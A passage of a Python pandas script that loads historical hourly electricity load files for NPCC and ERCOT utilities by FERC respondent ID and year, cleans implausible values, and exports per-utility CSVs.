1993 : pd.read_fwf('%s/npcc/1993/EUA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/EUA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/EUA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/EUA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/EUA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/EUA99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
7601 : {
1993 : pd.read_csv('%s/npcc/1993/GMP93' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=4)[0].replace('MWH', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/GMP94' % (fulldir), header=None)[0].values,
1995 : pd.read_csv('%s/npcc/1995/GMP95' % (fulldir), sep=' ', skipinitialspace=True, header=None)[0].values,
1996 : pd.read_csv('%s/npcc/1996/GMP96' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].values,
1997 : pd.read_csv('%s/npcc/1997/GMP97' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].values,
1998 : pd.read_csv('%s/npcc/1998/GMP98' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].astype(str).str[:3].astype(float).values,
1999 : pd.read_csv('%s/npcc/1999/GMP99' % (fulldir), sep=' ', skipinitialspace=True, header=None, skipfooter=1).iloc[:8760, 0].values,
2002 : pd.read_excel('%s/npcc/2002/GMP02' % (fulldir), skiprows=6, skipfooter=1).iloc[:, 0].values,
2003 : pd.read_excel('%s/npcc/2003/GMP03' % (fulldir), skiprows=6, skipfooter=1).iloc[:, 0].values,
2004 : pd.read_csv('%s/npcc/2004/GMP04' % (fulldir), skiprows=13, sep='\s').iloc[:, 0].values
},
13501 : {
2002 : pd.read_csv('%s/npcc/2002/ISONY02' % (fulldir), sep='\t')['mw'].values,
2003 : pd.read_excel('%s/npcc/2003/ISONY03' % (fulldir))['Load'].values,
2004 : pd.read_excel('%s/npcc/2004/ISONY04' % (fulldir)).loc[:, 'HR1':].values.ravel()
},
11171 : {
1994 : pd.read_fwf('%s/npcc/1994/LILC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/LILC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/LILC97' % (fulldir), skiprows=4, widths=[8,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
},
11806 : {
1998 : pd.read_fwf('%s/npcc/1998/MMWE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/MMWE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2000 : pd.read_fwf('%s/npcc/2000/MMWE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2001 : pd.read_fwf('%s/npcc/2001/MMWE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/npcc/2002/MMWE02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2003 : pd.read_fwf('%s/npcc/2003/MMWE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2004 : pd.read_fwf('%s/npcc/2004/MMWE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel()
},
13433 : {
1993 : pd.read_fwf('%s/npcc/1993/NEES93' % (fulldir), widths=(8,7), header=None, skipfooter=1)[1].values,
1994 : pd.read_csv('%s/npcc/1994/NEES94' % (fulldir), header=None, skipfooter=1, sep=' ', skipinitialspace=True)[3].values
},
13435 : {
1993 : pd.read_fwf('%s/npcc/1993/NEPOOL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/NEPOOL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/NEPOOL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=3).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/NEPOOL96' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
1997 : pd.read_fwf('%s/npcc/1997/NEPOOL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/NEPOOL98' % (fulldir), header=None).iloc[:, 5:17].values.ravel(),
1999 : pd.read_csv('%s/npcc/1999/NEPOOL99' % (fulldir), engine='python', skiprows=1).iloc[:, 0].values,
2000 : pd.read_fwf('%s/npcc/2000/NEPOOL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2001 : pd.read_fwf('%s/npcc/2001/NEPOOL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/NEPOOL02' % (fulldir), sep='\t').iloc[:, 3:].values.ravel(),
2003 : pd.read_fwf('%s/npcc/2003/NEPOOL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2004 : pd.read_csv('%s/npcc/2004/NEPOOL04' % (fulldir), sep='\t', header=None, skiprows=10).iloc[:, 5:].values.ravel()
},
13573 : {
1993 : pd.read_csv('%s/npcc/1993/NMPC93' % (fulldir), skiprows=11, header=None, sep=' ', skipinitialspace=True).iloc[:, 3:27].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/NMPC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/NMPC96' % (fulldir), header=None).iloc[:, 2:14].astype(int).values.ravel(),
1998 : pd.read_fwf('%s/npcc/1998/NMPC98' % (fulldir), header=None).iloc[:, 2:].astype(int).values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/NMPC99' % (fulldir), header=None).iloc[:, 2:14].astype(int).values.ravel(),
2000 : pd.read_excel('%s/npcc/2000/NMPC00' % (fulldir), sheetname=1, skiprows=10, skipfooter=3).iloc[:, 1:].values.ravel(),
2002 : pd.read_excel('%s/npcc/2002/NMPC02' % (fulldir), sheetname=1, skiprows=2, header=None).iloc[:, 2:].values.ravel(),
2003 : pd.concat([pd.read_excel('%s/npcc/2003/NMPC03' % (fulldir), sheetname=i, skiprows=1, header=None) for i in range(1,13)]).iloc[:, 2:].astype(str).apply(lambda x: x.str[:4]).astype(float).values.ravel()
},
13556 : {
1993 : pd.read_fwf('%s/npcc/1993/NU93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_excel('%s/npcc/1994/NU94' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1995 : pd.read_excel('%s/npcc/1995/NU95' % (fulldir), header=None, skipfooter=5).dropna(how='any').iloc[:, 3:].values.ravel(),
1996 : pd.read_excel('%s/npcc/1996/NU96' % (fulldir), header=None, skipfooter=1).iloc[:, 5:].values.ravel(),
1997 : pd.read_excel('%s/npcc/1997/NU97' % (fulldir), header=None, skipfooter=4).iloc[:, 5:].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/NU98' % (fulldir), header=None).iloc[:, 5:].values.ravel(),
1999 : pd.read_excel('%s/npcc/1999/NU99' % (fulldir), header=None).iloc[:, 5:].values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/NU00' % (fulldir), sep='\t', header=None).iloc[:, 5:].values.ravel(),
2001 : pd.read_excel('%s/npcc/2001/NU01' % (fulldir)).iloc[:, -1].values,
2002 : pd.read_excel('%s/npcc/2002/NU02' % (fulldir)).iloc[:, -1].values,
2003 : pd.read_excel('%s/npcc/2003/NU03' % (fulldir), skipfooter=1).iloc[:, -1].values
},
15296 : {
1993 : pd.read_csv('%s/npcc/1993/NYPA93' % (fulldir), engine='python', header=None).values.ravel(),
1994 : pd.read_csv('%s/npcc/1994/NYPA94' % (fulldir), engine='python', header=None).values.ravel(),
1995 : pd.read_csv('%s/npcc/1995/NYPA95' % (fulldir), engine='python', header=None).values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/NYPA96' % (fulldir), engine='python', header=None).values.ravel(),
1997 : pd.read_csv('%s/npcc/1997/NYPA97' % (fulldir), engine='python', header=None).values.ravel(),
1998 : pd.read_csv('%s/npcc/1998/NYPA98' % (fulldir), engine='python', header=None).values.ravel(),
1999 : pd.read_excel('%s/npcc/1999/NYPA99' % (fulldir), header=None).values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/NYPA00' % (fulldir), engine='python', header=None).values.ravel(),
2001 : pd.read_csv('%s/npcc/2001/NYPA01' % (fulldir), engine='python', header=None).values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/NYPA02' % (fulldir), engine='python', header=None).values.ravel(),
2003 : pd.read_csv('%s/npcc/2003/NYPA03' % (fulldir), engine='python', header=None).values.ravel()
},
13501 : {
1993 : pd.read_fwf('%s/npcc/1993/NYPP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
13511 : {
1996 : pd.read_fwf('%s/npcc/1996/NYS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/NYS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1999 : pd.read_excel('%s/npcc/1999/NYS99' % (fulldir)).iloc[:, 1:].values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/NYS00' % (fulldir), sep='\t').iloc[:, -1].values,
2001 : pd.read_csv('%s/npcc/2001/NYS01' % (fulldir), sep='\t', skiprows=3).dropna(how='all').iloc[:, -1].values,
2002 : pd.read_csv('%s/npcc/2002/NYS02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=3).iloc[:, 2].values,
2003 : pd.read_csv('%s/npcc/2003/NYS03' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).iloc[:, -1].values,
2004 : pd.read_csv('%s/npcc/2004/NYS04' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).dropna(how='all').iloc[:, -1].values
},
14154 : {
1993 : pd.read_csv('%s/npcc/1993/OR93' % (fulldir), skiprows=5, header=None).iloc[:, 2:26].values.ravel(),
1995 : (pd.read_csv('%s/npcc/1995/OR95' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
1996 : (pd.read_csv('%s/npcc/1996/OR96' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
1997 : (pd.read_csv('%s/npcc/1997/OR97' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
1998 : pd.read_fwf('%s/npcc/1998/OR98' % (fulldir), skiprows=1, header=None).dropna(axis=1, how='all').iloc[:, 1:].values.ravel(),
1999 : pd.read_csv('%s/npcc/1999/OR99' % (fulldir), sep='\t', skiprows=1, header=None).iloc[:, 1:].values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/OR00' % (fulldir), sep='\t').iloc[:, -1].values.astype(int).ravel(),
2002 : pd.read_csv('%s/npcc/2002/OR02' % (fulldir), sep='\t', skiprows=2).iloc[:, -1].dropna().values.astype(int).ravel(),
2003 : pd.read_csv('%s/npcc/2003/OR03' % (fulldir), sep='\t').iloc[:, -1].dropna().values.astype(int).ravel(),
2004 : pd.read_csv('%s/npcc/2004/OR04' % (fulldir), header=None).iloc[:, -1].values.astype(int).ravel()
},
16183 : {
1994 : pd.read_fwf('%s/npcc/1994/RGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/RGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/RGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/RGE02' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values,
2003 : pd.read_csv('%s/npcc/2003/RGE03' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values,
2004 : pd.read_csv('%s/npcc/2004/RGE04' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values
},
19497 : {
1993 : pd.read_fwf('%s/npcc/1993/UI93' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1994 : pd.read_fwf('%s/npcc/1994/UI94' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1995 : pd.read_fwf('%s/npcc/1995/UI95' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1996 : pd.read_fwf('%s/npcc/1996/UI96' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1997 : pd.read_fwf('%s/npcc/1997/UI97' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1998 : pd.read_excel('%s/npcc/1998/UI98' % (fulldir))['MW'].values,
1999 : pd.read_excel('%s/npcc/1999/UI99' % (fulldir)).loc[:, 'HR1':'HR24'].values.ravel(),
2001 : pd.read_excel('%s/npcc/2001/UI01' % (fulldir), sheetname=0).ix[:-2, 'HR1':'HR24'].values.ravel(),
2002 : pd.read_excel('%s/npcc/2002/UI02' % (fulldir), sheetname=0).ix[:-2, 'HR1':'HR24'].values.ravel(),
2003 : pd.read_excel('%s/npcc/2003/UI03' % (fulldir), sheetname=0, skipfooter=2).ix[:, 'HR1':'HR24'].values.ravel(),
2004 : pd.read_excel('%s/npcc/2004/UI04' % (fulldir), sheetname=0, skipfooter=1).ix[:, 'HR1':'HR24'].values.ravel()
}
}
# --- NPCC post-processing and export --------------------------------------
# ID 4226, 1995 was read as a raw frame: splice columns 2 and 6 into a
# single hourly vector.  NOTE(review): column meaning is assumed from the
# upstream read layout -- confirm against the 1995 source file.
npcc[4226][1995] = pd.concat([npcc[4226][1995][2].dropna(), npcc[4226][1995][6]]).values.ravel()

# Zero out implausible spikes (> 5000) in series with known bad values;
# zeros become NaN at export time below.
for _ba, _yr in ((3249, 1994), (3249, 1996), (15296, 2000), (15296, 2001)):
    npcc[_ba][_yr][npcc[_ba][_yr] > 5000] = 0

# The 1998 series for ID 4089 is unusable: blank the whole year to NaN.
npcc[4089][1998] = np.repeat(np.nan, len(npcc[4089][1998]))

# NYS (ID 13511): values below 500 are implausibly low -- zero them.
for _yr in (1996, 1997, 1999, 2000):
    npcc[13511][_yr][npcc[13511][_yr] < 500] = 0

# OR (ID 14154) 2002: clip spikes above 2000.
npcc[14154][2002][npcc[14154][2002] > 2000] = 0

# Export one CSV per respondent ID: concatenate the yearly vectors on an
# hourly DatetimeIndex starting Jan 1 of each year, then write ./npcc/<id>.csv.
if not os.path.exists('./npcc'):
    os.mkdir('npcc')
for k in npcc.keys():
    # print() call form works identically on Python 2 and 3 for one argument.
    print(k)
    s = pd.DataFrame(pd.concat([pd.Series(npcc[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(npcc[k][i]))) for i in npcc[k].keys()]).sort_index(), columns=['load'])
    # Literal '.' placeholders become 0, then every 0 becomes NaN (missing).
    s['load'] = s['load'].replace('.', '0').astype(float).replace(0, np.nan)
    s.to_csv('./npcc/%s.csv' % k)
###### ERCOT
# AUST: 1015
# CPL: 3278
# HLP: 8901
# LCRA: 11269
# NTEC: 13670
# PUB: 2409
# SRGT: 40233
# STEC: 17583
# TUEC: 44372
# TMPP: 18715
# TXLA: 18679
# WTU: 20404
# Hourly load series for ERCOT reporting utilities, keyed by FERC respondent
# ID, then by year.  Each value is a flat 1-D array of hourly loads.  Most
# years come from fixed-width "day x 24 hours" text files; 1998-2000 come
# from region-wide FERC-714 spreadsheets, one column per utility, divided by
# 1000 (presumably a kW -> MW unit conversion -- confirm against the source).
ercot = {
    1015 : {  # AUST (Austin); FERC-714 column 'AENX'
        1993 : pd.read_fwf('%s/ercot/1993/AUST93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/ercot/1994/AUST94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/AUST95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/AUST96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/AUST97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['AENX'].loc[2:].astype(float)/1000).values,
        1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['AENX'].astype(float)/1000).values,
        # 2000 region file is tab-separated with comma thousands separators.
        2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[3].str.replace(',', '').astype(float)/1000).values
    },
    3278 : {  # CPL; FERC-714 column 'CPLC'
        1993 : pd.read_fwf('%s/ercot/1993/CPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/ercot/1994/CPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/CPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/CPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['CPLC'].loc[2:].astype(int)/1000).values
    },
    8901 : {  # HLP; FERC-714 column 'HLPC'
        1993 : pd.read_fwf('%s/ercot/1993/HLP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/ercot/1994/HLP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/HLP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/HLP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/HLP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['HLPC'].loc[2:].astype(int)/1000).values
    },
    11269: {  # LCRA
        1993 : pd.read_fwf('%s/ercot/1993/LCRA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_csv('%s/ercot/1994/LCRA94' % (fulldir), skiprows=4).iloc[:, -1].values,
        1995 : pd.read_fwf('%s/ercot/1995/LCRA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/LCRA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/LCR97' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['LCRA'].loc[2:].astype(int)/1000).values,
        1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['LCRA'].astype(float)/1000).values,
        2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[6].str.replace(',', '').astype(float)/1000).values
    },
    13670 : {  # NTEC
        1993 : pd.read_csv('%s/ercot/1993/NTEC93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
        1994 : pd.read_fwf('%s/ercot/1994/NTEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/NTEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/NTEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/NTEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2001 : pd.read_fwf('%s/ercot/2001/NTEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
    },
    2409 : {  # PUB; FERC-714 column 'PUBX'
        1993 : pd.read_fwf('%s/ercot/1993/PUB93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/ercot/1994/PUB94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/PUB95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/PUB96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/PUB97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['PUBX'].loc[2:].astype(int)/1000).values,
        1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['PUBX'].astype(float)/1000).values,
        2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[7].str.replace(',', '').astype(float)/1000).values
    },
    40233 : {  # SRGT
        1993 : pd.read_csv('%s/ercot/1993/SRGT93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
        1994 : pd.read_fwf('%s/ercot/1994/SRGT94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/SRGT95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/SRGT96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/SRGT97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
    },
    17583 : {  # STEC
        1993 : pd.read_fwf('%s/ercot/1993/STEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['STEC'].loc[2:].astype(int)/1000).values,
        1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['STEC'].astype(float)/1000).values,
        2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[9].str.replace(',', '').astype(float)/1000).values
    },
    44372 : {  # TUEC
        1993 : pd.read_fwf('%s/ercot/1993/TUEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/ercot/1994/TUEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/TUEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/TUE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/TUE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['TUEC'].loc[2:].astype(int)/1000).values
    },
    18715 : {  # TMPP
        1993 : pd.read_csv('%s/ercot/1993/TMPP93' % (fulldir), skiprows=7, header=None, sep=' ', skipinitialspace=True).iloc[:, 3:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/TMPP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/TMPP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['TMPP'].astype(float)/1000).values,
        2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[10].str.replace(',', '').astype(float)/1000).values
    },
    18679 : {  # TXLA
        1993 : pd.read_csv('%s/ercot/1993/TEXLA93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
        1995 : pd.read_fwf('%s/ercot/1995/TXLA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/TXLA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/TXLA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['TXLA'].loc[2:].astype(int)/1000).values
    },
    20404 : {  # WTU; FERC-714 column 'WTUC'
        # 1993 file has blank cells: regex-replace whitespace with '0' first.
        1993 : pd.read_fwf('%s/ercot/1993/WTU93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(str).apply(lambda x: x.str.replace('\s', '0')).astype(float).values.ravel(),
